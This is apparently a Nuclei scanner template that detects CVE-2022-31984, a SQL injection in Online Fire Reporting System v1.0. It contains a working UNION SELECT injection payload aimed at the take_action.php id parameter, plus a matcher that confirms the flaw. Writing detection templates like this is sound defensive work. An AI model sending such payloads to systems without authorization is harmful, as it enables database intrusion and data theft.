49 lines
1.9 KiB
YAML
49 lines
1.9 KiB
YAML
id: CVE-2022-31984
|
|
|
|
info:
|
|
name: Online Fire Reporting System v1.0 - SQL injection
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database.
|
|
remediation: |
|
|
To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
|
|
reference:
|
|
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-10.md
|
|
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31984
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2022-31984
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00834
|
|
epss-percentile: 0.80157
|
|
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: online_fire_reporting_system_project
|
|
product: online_fire_reporting_system
|
|
tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project
|
|
variables:
|
|
num: '999999999'
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '{{md5(num)}}'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220335da5f70cacd62f923b6a9c87d10a164226bd63228ca77eca7a93b98f21e4dd022100b1503788bdabab77034a49812faaae299696bd36eefec2125bd5c2903842adb9:922c64590222798bb761d5b6d8e72950 |